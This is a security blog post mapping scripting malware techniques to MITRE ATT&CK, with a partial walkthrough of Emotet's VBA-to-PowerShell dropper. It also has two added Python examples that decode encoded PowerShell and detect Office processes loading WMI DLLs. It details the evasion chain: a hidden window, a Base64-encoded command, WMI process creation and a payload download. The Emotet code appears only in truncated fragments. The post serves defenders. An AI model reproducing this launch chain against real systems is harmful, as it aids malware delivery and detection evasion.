In 2019, Picus Labs analyzed 48,813 malware samples to determine the tactics, techniques, and procedures (TTPs) used by adversaries in these malicious files. Picus Labs categorized each observed TTP using the MITRE ATT&CK® framework. As a result of this research, 445,018 TTPs observed in the last year were mapped to ATT&CK to identify the 10 most common techniques used by attackers. Our research found that Scripting was the sixth most prevalent ATT&CK technique used by adversaries in their malware.
A script is a set of code written in a scripting language such as AppleScript, PowerShell, Python, Unix shells (bash, sh and others), VBScript, and JavaScript/JScript. Legitimate users such as system administrators and programmers use scripting to accelerate operational tasks by automating them in scripts. Adversaries also use scripts to automate multiple actions.
Introduction
A script is an ordered set of commands written in a scripting language. A scripting language is an interpreted programming language that executes scripts without compiling them. Not only legitimate users but also adversaries use Scripting to automate long tasks and execute code that performs multiple actions. Some scripting languages, such as PowerShell and VBScript on Windows, Unix shells on Unix-based systems, and AppleScript on macOS, can interact directly with the operating system at the API level, so adversaries can use them to bypass weak process monitoring mechanisms.
In this article, we review:
- the fundamentals of the Scripting technique
- updates on the technique in the new version of the ATT&CK framework
- sub-techniques derived from the Scripting technique
- its use cases by threat actors and malware
- red and blue team exercises for this technique
Changes in the New Version of the MITRE ATT&CK Framework
The July 2020 (v7) ATT&CK release is the first non-beta release of Enterprise ATT&CK represented with sub-techniques [1]. MITRE ATT&CK sub-techniques are a way to describe a specific implementation of a technique in more detail.
In the new sub-technique version of the MITRE ATT&CK framework, the T1064 Scripting technique is deprecated. However, it was not completely removed in the new version. The Scripting technique is split into the separate T1059.004 Unix Shell, T1059.005 Visual Basic, T1059.006 Python, and T1059.007 JavaScript/JScript sub-techniques of T1059 Command and Scripting Interpreter.
Command and Scripting Interpreter Sub-techniques
The first three sub-techniques of the Command and Scripting Interpreter technique, T1059.001 PowerShell, T1059.002 AppleScript, and T1059.003 Windows Command Shell, were explained in our Command-Line Interface blog post. Command-Line Interface was the sixth most prevalent ATT&CK technique according to our 10 Critical ATT&CK Techniques research. Although these three sub-techniques also cover scripting languages, they were not included in the Scripting technique of the previous ATT&CK version, since they were stand-alone techniques.
In this blog post, we describe the four other sub-techniques that are derived from the Scripting technique.
- T1059.004 Unix Shell
The Unix shell is the primary command-line interpreter that provides a command-line interface (CLI) for Unix-based operating systems (OS) such as macOS, Linux, and BSD. The Bourne Shell (sh), Bourne-Again Shell (bash), Z Shell (zsh), Korn Shell (ksh), and Secure Shell (SSH) are the most commonly used Unix shells.
In addition to an interactive CLI, the Unix shell also provides a scripting language to control the execution of the OS using shell scripts. Basically, a shell script is a set of commands listed in their execution order. The Unix shell can control any part of the system and supports typical programming concepts such as conditional tests, loops, file operations, variables, and functions.
Since Unix shells are powerful and flexible tools that execute commands and control the system, adversaries use Unix shells to execute various commands and malicious payloads. Moreover, they control remote systems with SSH during the lateral movement and command and control phases. Some use cases of Unix shells in malware:
- to execute multiple commands on victims: macOS Bundlore adware [2], Derusbi malware [3], Linux/Exaramel backdoor [4]
- to create a reverse shell: CallMe OSX Trojan [5], Chaos backdoor [6], CoinTicker macOS cryptocurrency ticker [7]
- to start/stop OS services and installed applications: LoudMiner cross-platform cryptocurrency miner [8], WindTail OSX backdoor [9]
- to download additional payloads: Shlayer macOS malware [9], [10], Skidmap cryptocurrency miner [11]
- T1059.005 Visual Basic
- Visual Basic for Applications (VBA): VBA is an implementation of the Visual Basic language that provides process automation, Windows API access, and other low-level functionality through DLLs. It is included in most Microsoft Office applications, including Office for macOS. In a common malicious usage scenario, adversaries embed their malicious code in VBA macros in Microsoft Office files, then send these files to victims as email attachments (MITRE ATT&CK T1566.001 Spearphishing Attachment).
- VBScript (Microsoft Visual Basic Scripting Edition): VBScript is a derivative of Visual Basic that enables the user to control many aspects of the system by using COM. Although VBScript initially targeted web developers by providing web client scripting in Internet Explorer and web server scripting in IIS, it gained support from Windows system administrators, and from adversaries, because of its extensive functionality. For example, in a malware campaign revealed in March 2020, an obfuscated VBScript package was used to drop various malware such as Zloader, Ursnif, Qakbot, and Dridex [16]. The initial access vector was an email containing a zipped VBScript file (.vbs) that appeared to be an invoice.
- T1059.006 Python
Python is a popular high-level interpreted programming language. Since Python interpreters are available for most operating systems and Python has a comprehensive standard library, adversaries use Python to execute commands, download payloads, and perform various other malicious behaviors. Threat actors create not only malware but also vulnerability exploitation tools with Python.
Python can be executed in multiple ways:
- interactively from the command-line interface (CLI)
- via Python scripts (.py)
- via binary executables created by compiling Python code
One of the most recent Python-based malware families is the PoetRAT remote access trojan (RAT) [17]. Briefly, it uses a Word document containing a VBA script to drop a ZIP file. The VBA macro then unzips the archive and executes PoetRAT, which is a Python script. The ZIP file also contains a Python interpreter because Windows has no default Python interpreter.
- T1059.007 JavaScript/JScript
JavaScript (JS) is a high-level and multi-paradigm programming language that supports event-driven, functional, and imperative programming styles. JavaScript conforms to the ECMAScript specification, which is a standard for the interoperability of web pages across different browsers. In fact, ECMAScript is the official name of the JavaScript language [18]. JScript is Microsoft’s implementation of the ECMAScript language specification [19]. Like most scripting languages, it is interpreted. In most cases, adversaries use JScript to develop droppers/downloaders that install/download the actual malware [20], [21]. They apply heavy obfuscation to .js files to evade static AV signatures [20], [21]. In some cases, adversaries use VBA and JScript together in their malware, as in TrickBot [22].
Red and Blue Team Exercises
Red Teaming - How to simulate?
In this exercise, we explain real VBA code that was used by the Emotet malware. We analyzed this payload in the following blog posts:
- Emotet Technical Analysis - Part 1 Reveal the Evil Code
- Emotet Technical Analysis - Part 2 PowerShell Unveiled
This payload was included in the following Word document:
MD5: 515f13034bc4ccf635b026722fd5ef9c
Researchers identified Emotet for the first time in 2014 as banking malware stealing sensitive and private information. Now, adversaries are using Emotet as Infrastructure as a Service (IaaS) for delivering malware, including other banking Trojans. Emotet incorporates various obfuscation and evasion techniques in its payload to avoid detection.
Briefly, the VBA code embedded in the Word document executes an encoded PowerShell command via WMI, then the PowerShell code downloads the second-stage payload of Emotet. Windows Management Instrumentation (WMI) is the infrastructure for management data and operations on Windows-based operating systems [23].
Do While GetObject(winmgmtS:win32_Process).Create Loop
Let’s split and analyze the command:
- Do While GetObject(winmgmtS:win32_Process).Create(): In the Do While loop, the Create method of WMI’s Win32_Process class is used to create a new process. The first parameter of this method is the CommandLine to execute, which in this code is a PowerShell command.
- Powershell -w hidden: There is no parameter named -w in the official PowerShell documentation [24]. In fact, PowerShell completes -w to the -WindowStyle parameter because of its parameter substring completion feature. Adversaries commonly use the -WindowStyle parameter with the Hidden value in malicious PowerShell commands to avoid detection.
- -en: Similar to -w, there is no parameter named -en in the official PowerShell documentation [24]. PowerShell completes -en to the -EncodedCommand parameter, which accepts a Base64-encoded string version of a command. Therefore, we must Base64-decode it to reveal the PowerShell command.
After Base64 decoding, removing garbage variables, backtick (`) and plus (+) characters, substituting the values of variables, and beautifying the code, we get the following code. You can read the details of this de-obfuscation process in our blog post [25].
$list=(
Briefly, this code tries to download a file from the URLs included in the $list array, in the given order, via the Net.WebClient.DownloadFile method and saves the downloaded file to the $env:userprofile directory as 937.exe.
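The parameter completion and Base64 decoding described above, as an added defender-side example that is not part of the original post: it expands abbreviated powershell.exe parameters by prefix (a simplified model of PowerShell's completion, assumed here), decodes -EncodedCommand from its Base64/UTF-16LE form, and reports the findings a detection rule would flag. The sample command line is constructed and benign.

```python
import base64

# powershell.exe parameter names as listed in about_PowerShell_exe. powershell.exe
# accepts any unambiguous prefix of a parameter name, which is why "-w" resolves to
# -WindowStyle and "-en" to -EncodedCommand. Pure prefix matching is an assumption
# of this example (the real binary also has fixed aliases such as -e).
PARAMETERS = ("-EncodedCommand", "-WindowStyle", "-ExecutionPolicy", "-NoProfile",
              "-NonInteractive", "-NoLogo", "-NoExit", "-Command", "-File", "-Version")


def expand_parameter(token):
    """Resolve an abbreviated parameter such as "-w" to its full name, or None if ambiguous."""
    matches = [p for p in PARAMETERS if p.lower().startswith(token.lower())]
    return matches[0] if len(matches) == 1 else None


def analyze_command_line(cmdline):
    """Expand abbreviated parameters, decode -EncodedCommand and report what a detection
    rule would flag. Returns {"parameters", "decoded", "findings"}."""
    tokens = cmdline.split()
    params, findings, decoded = {}, [], None
    i = 1  # tokens[0] is the executable name
    while i < len(tokens):
        token = tokens[i]
        if not token.startswith("-"):
            i += 1
            continue
        name = expand_parameter(token) or token
        has_value = i + 1 < len(tokens) and not tokens[i + 1].startswith("-")
        params[name] = tokens[i + 1] if has_value else None
        i += 2 if has_value else 1
    if (params.get("-WindowStyle") or "").lower() == "hidden":
        findings.append("hidden window (T1564.003)")
    encoded = params.get("-EncodedCommand")
    if encoded:
        # -EncodedCommand carries the script as Base64 over its UTF-16LE byte form.
        raw = base64.b64decode(encoded + "=" * (-len(encoded) % 4))
        decoded = raw.decode("utf-16-le", errors="replace")
        findings.append("base64-encoded command (T1027)")
    return {"parameters": params, "decoded": decoded, "findings": findings}


def encode_command(script):
    """Build the Base64/UTF-16LE form -EncodedCommand expects; used only to construct the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample with the same shape as the Emotet launcher (hidden window plus an
# encoded command). The script body is benign and made up for this example.
SAMPLE_SCRIPT = "$list = @('http://example.invalid/a', 'http://example.invalid/b'); $list.Count"
SAMPLE_CMDLINE = "powershell -w hidden -en " + encode_command(SAMPLE_SCRIPT)
```

Running analyze_command_line over process-creation logs surfaces both the hidden window and the encoded command, and the decoded script can then be inspected for download URLs such as the $list array above.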
In conclusion, the VBA code given in this exercise incorporates the following MITRE ATT&CK techniques:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1047 Windows Management Instrumentation
- T1059.001 Command and Scripting Interpreter: PowerShell
- T1564.003 Hide Artifacts: Hidden Window
- T1027 Obfuscated Files or Information
Blue Teaming - How to detect?
The following Sigma rule can be used to detect WMI DLLs loaded via VBA Macros in Word, Excel, PowerPoint and Outlook files:
title:
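The same detection idea expressed over Sysmon image-load events, as an added example that is not the post's Sigma rule: an Office process loading a WMI client DLL is flagged. The DLL and process names are assumptions of this example, and the events are constructed.

```python
import ntpath

# WMI client DLLs that an Office process has no ordinary reason to load; this list is an
# assumption of this example, not taken from the post's Sigma rule.
WMI_DLLS = {"wbemdisp.dll", "wbemcomn.dll", "wbemprox.dll", "wbemsvc.dll", "wmiutils.dll", "fastprox.dll"}
OFFICE_PROCESSES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def basename_lower(path):
    """Windows basename, case-folded, so matching ignores install path and letter case."""
    return ntpath.basename(path).lower()


def is_office_wmi_load(event):
    """True for a Sysmon image-load event (EventID 7) where an Office process loads a WMI DLL."""
    return (event.get("EventID") == 7
            and basename_lower(event.get("Image", "")) in OFFICE_PROCESSES
            and basename_lower(event.get("ImageLoaded", "")) in WMI_DLLS)


def find_office_wmi_loads(events):
    """Return (process, dll) pairs for every matching event, preserving order."""
    return [(basename_lower(e["Image"]), basename_lower(e["ImageLoaded"]))
            for e in events if is_office_wmi_load(e)]


# Constructed Sysmon-style events; paths and values are made up for this example.
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ImageLoaded": r"C:\Windows\System32\wbem\wbemdisp.dll"},
    {"EventID": 7, "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
    {"EventID": 7, "Image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "ImageLoaded": r"C:\Windows\System32\wbem\wbemcomn.dll"},
    {"EventID": 1, "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"},
]
```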
References
[1] “Updates - July 2020.” [Online]. Available: https://attack.mitre.org/resources/updates/updates-july-2020/. [Accessed: 10-Aug-2020]
[2] O. Sushko, “macOS Bundlore: Mac Virus Bypassing macOS Security Features,” 17-Apr-2019. [Online]. Available: https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis. [Accessed: 11-Aug-2020]
[3] “Website.” [Online]. Available: https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdf. [Accessed: 11-Aug-2020]
[4] “New TeleBots backdoor: First evidence linking Industroyer to NotPetya,” 11-Oct-2018. [Online]. Available: https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/. [Accessed: 11-Aug-2020]
[5] R. Falcone and J. Miller-Osborn, “Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists,” 24-Jan-2016. [Online]. Available: https://unit42.paloaltonetworks.com/scarlet-mimic-years-long-espionage-targets-minority-activists/. [Accessed: 11-Aug-2020]
[6] S. Feldmann, “Chaos: a Stolen Backdoor Rising Again,” 14-Feb-2018. [Online]. Available: https://www.gosecure.net/blog/2018/02/14/chaos-a-stolen-backdoor-rising/. [Accessed: 11-Aug-2020]
[7] T. Reed, “Mac cryptocurrency ticker app installs backdoors,” 29-Oct-2018. [Online]. Available: https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/. [Accessed: 11-Aug-2020]
[8] “LoudMiner: Cross‑platform mining in cracked VST software,” 20-Jun-2019. [Online]. Available: https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/. [Accessed: 11-Aug-2020]
[9] “Middle East Cyber-Espionage.” [Online]. Available: https://objective-see.com/blog/blog_0x3B.html. [Accessed: 11-Aug-2020]
[10] “TAU Threat Intelligence Notification: New macOS Malware Variant of Shlayer (OSX) Discovered,” 12-Feb-2019. [Online]. Available: https://www.carbonblack.com/blog/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/. [Accessed: 11-Aug-2020]
[11] Trend Micro, “Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload,” 16-Sep-2019. [Online]. Available: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/. [Accessed: 11-Aug-2020]
[12] mcleanbyron, “The Component Object Model.” [Online]. Available: https://docs.microsoft.com/en-us/windows/win32/com/the-component-object-model. [Accessed: 11-Aug-2020]
[13] “The Windows Native API - TechNet Articles - United States (English) - TechNet Wiki.” [Online]. Available: https://social.technet.microsoft.com/wiki/contents/articles/11831.the-windows-native-api.aspx. [Accessed: 11-Aug-2020]
[14] “Inter-Process Communication: Component Object Model.” [Online]. Available: https://attack.mitre.org/techniques/T1559/001/. [Accessed: 11-Aug-2020]
[15] “Native API.” [Online]. Available: https://attack.mitre.org/techniques/T1106/. [Accessed: 11-Aug-2020]
[16] blubracket, “Obfuscated VBScript Drops Zloader, Ursnif, Qakbot, Dridex - Security Boulevard,” 24-Jun-2020. [Online]. Available: https://securityboulevard.com/2020/06/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex/. [Accessed: 11-Aug-2020]
[17] W. Mercer, “PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors.” [Online]. Available: http://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html. [Accessed: 12-Aug-2020]
[18] “JavaScript Versions.” [Online]. Available: https://www.w3schools.com/js/js_versions.asp. [Accessed: 12-Aug-2020]
[19] “JScript (ECMAScript3).” [Online]. Available: https://docs.microsoft.com/en-us/previous-versions/hbxc2t98(v=vs.85). [Accessed: 12-Aug-2020]
[20] “Undetected JScript Dropper Installs Sage Ransomware,” 20-Apr-2017. [Online]. Available: https://www.vmray.com/cyber-security-blog/undetected-jscript-dropper-executes-sage-ransomware/. [Accessed: 12-Aug-2020]
[21] “[No title].” [Online]. Available: https://file.gdatasoftware.com/web/en/documents/whitepaper/G_DATA_Analysis_Script.Trojan-Downloader.Fodevepdf.A.pdf. [Accessed: 12-Aug-2020]
[22] “Deobfuscating Ostap: TrickBot’s 34,000 Line JavaScript Downloader,” 03-Sep-2019. [Online]. Available: https://threatresearch.ext.hp.com/deobfuscating-ostap-trickbots-javascript-downloader/. [Accessed: 12-Aug-2020]
[23] stevewhims, “Windows Management Instrumentation.” [Online]. Available: https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page. [Accessed: 11-Aug-2020]
[24] SteveL-MSFT, “about_PowerShell_exe - PowerShell.” [Online]. Available: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_exe. [Accessed: 11-Aug-2020]
[25] S. Özarslan, “Emotet Technical Analysis - Part 2 PowerShell Unveiled.” [Online]. Available: https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled. [Accessed: 12-Aug-2020]